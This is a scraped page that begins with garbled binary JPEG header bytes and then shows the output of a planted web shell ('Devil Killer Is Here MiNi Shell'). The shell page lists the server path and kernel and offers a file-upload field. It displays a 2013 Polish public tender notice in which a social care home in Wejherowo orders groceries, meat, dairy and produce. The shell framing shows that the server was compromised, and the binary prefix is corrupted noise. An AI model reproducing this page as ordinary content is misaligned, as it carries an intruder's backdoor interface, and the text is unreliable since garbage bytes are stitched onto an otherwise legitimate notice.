JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/516628-N-2013.html

<p class="kh_header"><b>Wejherowo: Dostawa produktów ogólnospożywczych z podziałem na części na potrzeby żywienia w Domu Pomocy Społecznej</b><br>
<b>Numer ogłoszenia: 516628 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Przebendowskiego 1, 84-200 Wejherowo, woj. pomorskie, tel. 0-58 672-15-91, faks 0-58 672-67-11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów ogólnospożywczych z podziałem na części na potrzeby żywienia w Domu Pomocy Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Aromaty  10ml szt. 70,
Cukier waniliowy   32g szt. 220,
Cynamon  20g szt. 130,
Herbata granulowana  80g szt. 380,
Kakao   80g szt. 210,
Kwasek cytrynowy    20g szt. 270,
Liście laurowe  6g szt. 90,
Musztarda 460g szt. 260,
Ocet spirytusowy  0,5 litra  szt. 10,
Papryka mielona słodka  i ostra 20g szt. 120,
Pieprz naturalny   20g szt. 200,
Proszek do pieczenia  36g szt.100,
Przyprawa do piernika  20g szt. 10,
Soda oczyszczona 80g szt. 15,
Sól paczkowana 1kg kg 380,
Ziele angielskie 15g szt. 100,
Herbatniki petit 50g szt. 100,
Budyń 40g szt. 100,
Galaretki 75g szt. 170,
Przyprawa warzywna 1000g szt. 15,
Kawa zbożowa 500g szt. 35,
Keczup łagodny 480g szt. 350,
Kisiel 40g szt. 550,
Majonez 600g szt. 50,
Pieprz ziołowy 20g szt. 20,
Przyprawa magii 0,96 litra szt. 350,
Rodzynki 100g szt. 25,
Żelatyna 20g szt. 280,
Żurek w butelce 0,5l szt. 5,
Śliwki suszone 125g szt. 5,
Mąka ziemniaczana  kg 45,
Ananasy w syropie 580g szt. 50 ,
Dżem owocowy 280g szt. 240 ,
Kompot owocowy 900ml szt. 360, 
Marmolada 500g szt. 10,
Kukurydza  w puszcze 400g szt. 80,
Powidła 280g szt. 5,
Syrop  380 ml szt.1000,
Śliwki suszone kg 1,
Cukier puder kg 25,
Cukier torebki kg 960,
Miód sztuczny  340g szt. 50,
Fasolka szparagowa 500g szt. 430,
Groszek konserwowy 400g szt. 150,
Chrzan 190g szt. 55,
Ćwikła z chrzanem 350g szt. 40,
Koncentrat pomidorowy 900g szt. 130,
Majeranek 6g szt.250,
Marchew  z groszkiem 500g szt.250,
Ogórki konserwowe 870g szt. 160,
Mak kg 10,
Olej  1 litr szt. 30,
Olej  3 litr  80,
Kasza gryczana kg 65,
Kasza manna  kg 220,
Kasza mazurska  kg 70,
Kasa wiejska  kg 25,
Makaron nitki 400g szt. 200,
Makaron kolanko  400g szt. 200,
Makaron świderki 400g szt. 200,
Mąka tortowa 1kg- typ 500 kg 45,
Mąka wrocławska 1kg - typ 500 kg 600.
Płatki owsiane  1kg kg 50,
Ryż biały długo- ziarnisty kg 250,
Baleron wędzony parzony kg 15,
Biała  surowa kg 24,
mielonka drobiowa kg 180,
blok szynkowy wieprzowy kg 12,
boczek rolowany z przyprawami kg 10,
szynkówka dębicka kg 115,
krakowska parzona kg 20,
kaszanka kg 55,
bukowa kg 125,
mortadela popularna kg 220,
mielonka wieprzowa kanapkowa kg 85,
metka kaszubska kg 15,
mielonka turystyczna kg 65,
Podwawelska kg 35,
pasztetowa wieprzowa kg 185,
pasztet drobiowy zapiekany kg 50,
pieczeń chlebowa kg 75,
polędwica miodowa kg 12,
polędwica sopocka kg 12,
parówki wieprzowe PC kg 150,
serdelki wieprzowe kg 400,
salceson czarny ozorkowy kg 45,
salceson drobiowy kg 100,
salceson wieprzowy kg 35,
śląska kg 110,
szynka gotowana kg 18,
szynkówka wieprzowa kanapkowa kg 12,
ogonówka wieprzowa wędzona parzona kg 12,
toruńska wieprzowa kg 40 ,
zwyczajna kg 120,
żywiecka kg 6,
boczek wieprzowy wędzony b/kości kg 210,
boczek wieprzowy świeży b/kości kg 30,
karkówka wieprzowa bez kości kg 60,
łopatka wieprzowa bez kości ,bez skóry kg 85,
mięso wieprzowe z  szynki-gulaszowe kg 210,
mięso wieprzowe drobne z szynki kg 280,
słonina wieprzowa kg 130,
smalec wieprzowy kg 40,
schab wieprzowy bez kości kg 22,
szynka wieprzowa świeża bez kości kg 290,
wątroba wieprzowa kg 30,
żeberka wieprzowe kg 450,
porcje rosołowe drobiowe kg 760,
kurczaki kg 1000,
piersi z kurczaka kg 200,
wątroba drobiowa kg 100,
żołądki drobiowe kg 130, 
Mleko folia szt. 7450,
Mleko karton szt. 20,
Śmietana  36 procent szt. 10,
Śmietana luzem 18 procent litr 450,
Masło extra kg 1000,
Ser salami kg 10,
Ser gouda kg 50,
Ser morski kg 50,
Ser edamski kg 50,
Ser tylżycki kg 50,
Serek homogenizowany smakowy 250 g ,szt. 400,
Serek ostrowie smakowy 120g ,szt. 500,
Twaróg foremka kg 500, 
Ser topiony kostka 100g ,kg 170,
Margaryna palma250g,  kg 60, 
Margaryna rama 250g ,szt. 20,
Margaryna rama500g ,szt. 100 ,
Margaryna Delma 500g ,szt. 10,
Maślanka1 litr szt. 1050,
Jogurt owocowy 50g ,szt. 75,
Kefir1 litr szt. 10,
Filet z dorsza ze skórą kg 250,
Karp patroszony kg 20,
Kostka rybna mrożona kg 40,
Makrela patroszona bez głów kg 300,
Masełko rybne kg 55,
Mielone rybne z dorsza kg 70,
Płaty śledziowe solone kg 90,
Pstrąg patroszony kg 250,
Tuszka śledziowa kg 90,
Drożdże kg 15,
Ciasto drożdżowe kg 80,
Drożdżówki 100g szt. 150,
Bułki paryskie 300g szt. 1480,
Bułka tarta kg 170,
Chleb zwykły krojony 500g ,szt. 12000,
Chleb  zwykły razowy 500g ,kg 1250, 
Bułki szwedki 70g, szt. 50,
Pączki szt. 150,
Faworki kg 5,
Jabłecznik kg 5,
Drożdżowe z owocami kg 5,
Sernik kg 5,
Miodownik kg 5,
Ciasto kakaowe kg 5,
Babki różne kg 10,
Czosnek   Miesiąc I-III Kg 0,5,
Czosnek   Miesiąc IV-VI Kg 0,5,
Czosnek   Miesiąc VII-IX Kg 0,5,
Czosnek   Miesiąc X-XII Kg 0,5,
Fasola Jaś Miesiąc I-III Kg 10
Fasola Jaś Miesiąc IV-VI Kg 10,
Fasola Jaś Miesiąc VII-IX Kg 5,
Fasola Jaś Miesiąc X-XII Kg 15,
Fasolka drobna Miesiąc I-III Kg 10,
Fasolka drobna Miesiąc IV-VI Kg 5,
Fasolka drobna Miesiąc VII-IX Kg 15, 
Fasolka drobna Miesiąc X-XI Kg 10,
Fasolka szparagowa  Miesiąc VII-IX Kg 20,
Groch  Kg 15 ,
Gruszki Miesiąc VI-IX Kg 5,
Jabłka Miesiąc I-III Kg 300,
Jabłka Miesiąc IV-VI Kg 300,
Jabłka 1kg Miesiąc VII-IX Kg 300,
Jabłka 1kg Miesiąc X-XII Kg 350,
Jaja klasa L  Miesiąc I-III Szt. 3375,
Jaja klasa L - Miesiąc IV-VI Szt. 3375,
Jaja klasa L - Miesiąc VII-IX Szt. 3375,
Jaja klasa L - Miesiąc X-XII Szt. 3375,
Kalafior Miesiąc VI-VII Gł. 100,
Kalafior Miesiąc VIII-X Gł. 100,
Kapusta kiszona Miesiąc I-III Kg 90,
Kapusta kiszona Miesiąc IV-VI Kg 90,
Kapusta kiszona Miesiąc VII-IX Kg 100 ,
Kapusta kiszona Miesiąc X-XII Kg100,
Kapusta biała Miesiąc IV-VI Gł. 200,
Kapusta biała Miesiąc VII-X Gł. 200,
Kapusta biała Miesiąc I-III Kg 70,
Kapusta biała Miesiąc X-XII Kg 70,
Kapusta czerwona  Miesiąc X-XII Gł. 10,
Kapusta włoska Miesiąc I-III Gł. 3,
Kapusta włoska Miesiąc IV-VII Gł. 3,
Kapusta włoska Miesiąc VIII-IX Gł. 3, 
Kapusta włoska Miesiąc X-XII Gł. 3,
Kapusta pekińska Miesiąc I-III Gł. 3,
Kapusta pekińska Miesiąc IV-VI Gł. 3,
Kapusta pekińska Miesiąc VII-IX Gł. 3,
Kapusta pekińska Miesiąc X-XII Gł. 3,
Kiwi Kg 5,
Koperek Miesiąc I-III Pęcz. 180,
Koperek- Miesiąc IV-VI Pęczki 180 ,
Koperek Miesiąc VII-IX Pęczki 190,
Koperek- Miesiąc X-XII Pęczki 200 ,
Mandarynki Miesiąc I-II Kg 20 ,
Mandarynki  Miesiąc III-V Kg 20,
Mandarynki  Miesiąc X-XII Kg 20,
Marchew  Miesiąc I-III Kg 500,
Marchew  Miesiąc IV-VI Kg 500,
Marchew   Miesiąc VII-IX Kg 500,
Marchew  Miesiąc X-XII Kg 500,
Morele Miesiąc VII-VIII Kg 5,
Nektarynki Miesiąc VII-VIII Kg 5,
Ogórki kiszone Miesiąc I-III Kg 120,
Ogórki kiszone Miesiąc IV-VI Kg 120,
Ogórki kiszone Miesiąc VII-IX Kg 120,
Ogórki kiszone Miesiąc X-XII Kg 120,
Ogórki świeże  Miesiąc V-VII Kg 50,
Ogórki świeże   Miesiąc VIII-IX Kg 50,
Pieczarki   Miesiąc I-III Kg 15,
Pieczarki  Miesiąc IV-VI Kg 15,
Pieczarki  1kg Miesiąc VII-IX Kg 20,
Pieczarki  Miesiąc X-XII Kg 30,
Pietruszka   Miesiąc I-III Kg 110,
Pietruszka  Miesiąc IV-VI Kg 120,
Pietruszka   Miesiąc VII-IX Kg 110,
Pietruszka   Miesiąc X-XII Kg 120,
Pomarańcze  Miesiąc IV Kg 5,
Pomarańcze Miesiąc XII Kg 5,
Pomidory klasa II Miesiąc VII-VIII kg 100, Miesiąc IX-X kg 100
Por  Miesiąc I-III Kg 100,
Por  Miesiąc IV-VI Kg 100,
Por Miesiąc VII-IX Kg 100,
Por Miesiąc X-XII Kg 100,
Rzodkiewki Miesiąc I-III Pęczki 15,
Rzodkiewki Miesiąc IV-VI Pęczki 15,
Rzodkiewki Miesiąc VII-IX Pęczki 15,
Rzodkiewki i Miesiąc X-XII Pęczki 15,
Rzodkiew biała Miesiąc IX-XII Kg 5,
Sałata Miesiąc IV-VI Główki 100
Sałata Miesiąc VII-VIII Główki 100
Sałata główki Miesiąc IX- X Główki 100,
Sałata lodowa Główki 5,
Seler Miesiąc I-III Kg 130,
Seler Miesiąc IV-VI Kg 130,
Seler Miesiąc VII-IX Kg 130,
Seler Miesiąc X-XII Kg 130,
Szczypior Miesiąc I-III Pęczki 75,
Szczypior Miesiąc IV-VI Pęczki 75,
Szczypior Miesiąc VII-IX Pęczki 75,
Szczypior Miesiąc X-XII Pęczki 75,
Truskawki Sezon V-VII Kg 20,
Winogrono Miesiąc IX-XII Kg 5 ,
Zielona pietruszka pęczki 100g Miesiąc I-III Pęczki 180,
Zielona pietruszka pęczki 100g Miesiąc IV-VI Pęczki 180,
Zielona pietruszka pęczki 100g Miesiąc VII-IX Pęczki 180,
Zielona pietruszka pęczki 100g Miesiąc X-XII Pęczki 180,
Ziemniaki Miesiąc I-III Kg 2900,
Ziemniaki Miesiąc IV-VI Kg 2900,
Ziemniaki Miesiąc VII-IX Kg 2900,
Ziemniaki Miesiąc X-XII Kg 3000.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających ,stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy zgodnie i na zasadach określonych w art.67 ust.1 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.90.00-5, 15.13.11.34-3, 15.13.11.00-6, 15.13.11.30-5, 15.13.11.35-0, 15.22.00.00-6, 15.23.20.00-3, 15.23.40.00-7, 15.32.00.00-7, 15.33.22.00-6, 15.33.11.40-0, 15.41.10.00-2, 15.50.00.00-3, 15.43.00.00-1, 15.51.00.00-6, 15.53.00.00-2, 15.55.13.00-8, 15.55.15.00-0, 15.54.20.00-9, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności i spełnia warunki zawarte w art. 22 ust. 1 ustawy Wykonawca składa następujące dokumenty: aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca posiada wiedzę i doświadczenie wykonawca składa  oświadczenie sporządzone według wzoru określonego w załączniku nr 8 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie, że dostarczone produkty będą spełniały wymagania dotyczące bezpieczeństwa żywności i żywienia określone w przepisach prawa krajowego i europejskiego - według wzoru stanowiącego załącznik nr 10 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy złożą oświadczenie o spełnianiu warunku  art.22 ust. 1, sporządzone według wzoru stanowiącego załącznik nr 8 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy dokonana w formie pisemnego aneksu pod rygorem nieważności będzie dotyczyła zmiany obowiązującej stawki VAT.
W takim przypadku wynagrodzenie netto Wykonawcy nie ulegnie zmianie natomiast zostanie zmieniona stawka podatku VAT a co za tym idzie wynagrodzenie brutto Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswejherowo.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Wejherowie, ul. Przebendowskiego 1 , 
84-200 Wejherowo, Dział Gospodarczy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 10:00, miejsce: Dom Pomocy Społecznej w Wejherowie  przy ul. Przebendowskiego 1 , 
w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> różne produkty spożywcze, soki owocowe i warzywne, dżemy i marmolady, galaretki owocowe, przeciery z owoców, oleje roślinne , produkty z przemiału ziarna,cukier i produkty pokrewne, kakao, czekolada i wyroby cukiernicze,  kawa, herbata i podobne produkty, przyprawy i przyprawy korzenne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa wędlin, mięsa, drobiu i ich przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drób,Mięsa różne, Kaszanka i inne wędliny krwiste,Produkty mięsno-wędliniarskie, Wędliny,Wędliny drobiowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.90.00-5, 15.13.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty mleczarskie,tłuszcze jadalne,mleko i śmietana,masło,jogurt,
maślanka, ser świeży,ser twardy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
